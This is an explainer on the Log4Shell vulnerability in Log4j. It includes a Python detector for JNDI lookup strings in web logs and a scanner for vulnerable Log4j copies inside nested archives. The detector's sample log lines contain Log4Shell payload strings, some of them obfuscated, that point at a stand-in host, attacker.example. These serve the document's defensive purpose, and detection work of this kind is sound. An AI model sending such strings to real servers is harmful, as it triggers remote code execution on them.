For almost the entire month of December, the information security world has been talking about a vulnerability in a program called Log4j.
What is Log4j?
Log4j is an open source program that does logging: it writes records of what another program is doing (errors, logins, requests) so that people can look at them later. It is a core building block of many, many computer programs around the world. It is distributed by the Apache Software Foundation, one of the most respected open source communities in the world.
So, what is the problem?
On November 24th, 2021, Alibaba's security team found a vulnerability in this utility (a helper program that performs one specific task for other programs) and reported it privately to the Apache project, so that a fix could be prepared before the problem became public.
The vulnerability lets an attacker run code of their own choosing on a vulnerable server over the internet, without ever needing to go near it. This is called remote code execution. The trigger is nothing more than a specially crafted piece of text (it contains the instruction "jndi" followed by the address of a server the attacker controls) placed somewhere the application will log it: a username, a chat message, a web request header. When Log4j writes that text to the log it follows the instruction inside it, contacts the attacker's server, and loads and runs whatever code comes back. Because logging text that came from a user is completely normal, there are a great many ways to set this off.
Log4j is written in Java. The first version was released on January 8, 2001, almost 21 years ago, and in that time it has been built into thousands of programs across the world, in every industry. The affected versions are Log4j 2, from 2.0-beta9 up to and including 2.14.1; the older Log4j 1 branch does not have this particular flaw, although it is no longer maintained and has other problems.
The vulnerability has been named Log4Shell, and is tracked as CVE-2021-44228.
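To make the trigger described above concrete, here is a small Python detector written for this explainer; it is not part of Log4j and not code from Apache or from any product mentioned here. It scans web-server log lines for the kind of text that sets the vulnerability off, and undoes the tricks attackers use to hide the word "jndi" from a plain search: URL-encoding, and nesting other Log4j lookups such as ${lower:j} or ${env:NOPE:-j} inside the string. The log lines, the address attacker.example and all function names are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not captured from a real system). The
# quoted field at the end of each line stands for a logged User-Agent header.
SAMPLE_LINES = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.7 - - "GET /login HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - "GET /api HTTP/1.1" 404 "${${lower:j}ndi:${lower:l}dap://attacker.example/x}"',
    '10.0.0.3 - - "GET /x HTTP/1.1" 200 "${${env:NOPE:-j}ndi:${::-r}mi://attacker.example/y}"',
    '10.0.0.8 - - "GET /z HTTP/1.1" 200 "%24%7Bjndi%3Adns%3A%2F%2Fattacker.example%2Fz%7D"',
    '10.0.0.4 - - "GET /y HTTP/1.1" 200 "price is ${100} dollars"',
]

# An innermost ${...} lookup: one that contains no further ${ or } inside it.
INNERMOST = re.compile(r"\$\{([^${}]*)\}")
JNDI_PROBE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve_one(match):
    """Evaluate the two obfuscation lookups Log4j offers; keep everything else."""
    body = match.group(1)
    # ${anything:-default}: Log4j substitutes the default when the lookup fails,
    # so ${env:NOPE:-j} and ${::-j} both become the single letter j.
    if ":-" in body:
        return body.split(":-", 1)[1]
    name, sep, arg = body.partition(":")
    if sep and name.lower() == "lower":
        return arg.lower()
    if sep and name.lower() == "upper":
        return arg.upper()
    # Any other lookup (jndi included) is left in place so it stays visible.
    return match.group(0)


def normalize(text):
    """Undo URL-encoding and lookup nesting until nothing changes any more."""
    text = unquote(text)
    prev = None
    while text != prev:
        prev = text
        text = INNERMOST.sub(_resolve_one, text)
    return text


def is_log4shell_probe(line):
    return bool(JNDI_PROBE.search(normalize(line)))


def extract_targets(line):
    """Return the server addresses the lookup would contact, after normalizing."""
    return re.findall(r"\$\{\s*jndi\s*:([^}]*)\}", normalize(line), re.IGNORECASE)


def scan_lines(lines):
    """Indices of the lines that carry a Log4Shell-style lookup."""
    return [i for i, line in enumerate(lines) if is_log4shell_probe(line)]
```

A check like this is useful for seeing who is probing you and which servers they point to, but it is not a fix: there are endless ways to rewrite the string, and Log4j resolves many more lookups than the two handled here. The only real protection is to update, or disable the lookup in, every copy of the library.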
Cyber security experts around the world are taking this threat very seriously.
Why don’t we just remove or patch the vulnerability, like we usually do?
In the fence example we read earlier to understand the concept of a vulnerability, Hemant could either build a new fence altogether (remove it) or strengthen the existing fence by adding horizontal bars where needed. The second option is called patching.
In the case of Log4j we cannot do that easily, because a utility like this is not a separate program you can see on a list. It is bundled inside thousands of other programs, often inside a program that is itself bundled inside another one, and it is hard even to find every copy.
Companies have created scanning programs that go through all the applications on a network and check whether Log4j is being used. But these scanners are not always accurate: a copy that has been renamed, packed inside another file, or built into a program under a different name can be missed. Until every copy is found, the data and the network remain at risk.
The other issue is that, because it is open source and used by so many applications, each application may have used it in a different way or with its own small modifications. A single patch from Apache fixes Log4j itself, but every product that bundles it must ship its own update, and every organisation must then install each of those updates, or at least disable the dangerous lookup feature in each copy it finds.
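The scanning problem from the two paragraphs above, as an added Python example written for this page; it is not one of the commercial scanners mentioned and not Apache's code. It walks a directory, opens every .jar, .war and .ear archive, opens the archives nested inside them, and looks for the class that performs the dangerous lookup (JndiLookup.class) together with the version recorded by Maven in pom.properties. Each copy is then classified: vulnerable, mitigated (the class was deleted, which is Apache's documented workaround for copies that cannot be upgraded), or needs review (the class is present under a relocated package name, so the version cannot be read). The sample archives it builds are constructed fixtures, not real software; the file names, the version check and all function names are assumptions made for the example.

```python
import io
import os
import re
import tempfile
import zipfile

# Class that performs the JNDI lookup in log4j-core 2.x, and the Maven
# metadata file that records which version of log4j-core an archive bundles.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")

def parse_version(version):
    """Turn '2.14.1' or '2.0-beta9' into a tuple that sorts in release order."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-beta(\d+))?$", version)
    if not m:
        return None
    major, minor, patch, beta = (int(x) if x else 0 for x in m.groups())
    # A beta sorts before the final release of the same version number.
    return (major, minor, patch, 0 if m.group(4) else 1, beta)

def affected_by_cve_2021_44228(version):
    """True for log4j-core 2.0-beta9 through 2.14.1, None if unparseable."""
    v = parse_version(version)
    if v is None:
        return None
    return parse_version("2.0-beta9") <= v <= parse_version("2.14.1")

def classify(label, version, lookup_hits):
    if not lookup_hits:
        status = "mitigated (JndiLookup.class removed)"
    else:
        affected = affected_by_cve_2021_44228(version) if version else None
        if affected is None:
            status = "review (JndiLookup.class present, version unknown)"
        elif affected:
            status = "vulnerable"
        else:
            status = "not affected by CVE-2021-44228"
    return {"archive": label, "version": version, "status": status}

def inspect_archive(data, label, findings, depth=0):
    """Look inside one archive (given as bytes) and recurse into nested ones."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return
    names = zf.namelist()
    # Match on the path suffix so a shaded copy relocated under another
    # package (a common reason filename-based scanners miss it) is still found.
    lookup_hits = [n for n in names if n.endswith("log4j/core/lookup/JndiLookup.class")]
    version = None
    if POM_PROPERTIES in names:
        for line in zf.read(POM_PROPERTIES).decode("utf-8", "replace").splitlines():
            if line.startswith("version="):
                version = line.split("=", 1)[1].strip()
    if lookup_hits or version:
        findings.append(classify(label, version, lookup_hits))
    if depth < 8:  # jars inside wars inside ears: bounded recursion
        for n in names:
            if n.endswith(ARCHIVE_SUFFIXES):
                inspect_archive(zf.read(n), label + "!" + n, findings, depth + 1)

def scan_tree(root):
    """Scan every archive under root; returns one finding per Log4j copy."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for fn in sorted(filenames):
            if fn.endswith(ARCHIVE_SUFFIXES):
                path = os.path.join(dirpath, fn)
                with open(path, "rb") as f:
                    inspect_archive(f.read(), path, findings)
    return findings

def _zip_bytes(entries):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()

def build_sample_tree(root):
    """Constructed fixtures (not real software) covering three cases."""
    fake_class = b"\xca\xfe\xba\xbe"  # stands in for the real class file
    pom = b"version=2.14.1\n"
    vulnerable_core = _zip_bytes({JNDI_LOOKUP_CLASS: fake_class, POM_PROPERTIES: pom})
    mitigated_core = _zip_bytes({POM_PROPERTIES: pom})  # class deleted with zip -d
    shaded_core = _zip_bytes({"com/example/shaded/" + JNDI_LOOKUP_CLASS: fake_class})
    os.makedirs(os.path.join(root, "lib"), exist_ok=True)
    with open(os.path.join(root, "app.war"), "wb") as f:  # library nested in a war
        f.write(_zip_bytes({"WEB-INF/lib/log4j-core-2.14.1.jar": vulnerable_core}))
    with open(os.path.join(root, "lib", "log4j-core-2.14.1.jar"), "wb") as f:
        f.write(mitigated_core)
    with open(os.path.join(root, "lib", "fat-app.jar"), "wb") as f:
        f.write(shaded_core)

def run_demo():
    """Build the sample tree in a temporary directory, scan it, return findings."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return scan_tree(root)
```

Run scan_tree on a real application directory to get the same list of findings. The third fixture is the point of the example: a scanner that only checks file names or the exact class path would report the shaded copy as clean, while this one reports it for review because the version cannot be determined, which is exactly the inaccuracy the text warns about.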
So, what happens now?
At this time, it's a race between the attackers and the defenders. Both are working hard. The attackers are trying to use the vulnerability to break into systems, bring networks to a standstill, or steal data.
Security firms are working to protect as many devices as they can, and are watching for attacks much more closely.
Many volunteer programmers at the Apache Software Foundation have been working almost non-stop since the vulnerability was reported, releasing a series of fixed versions.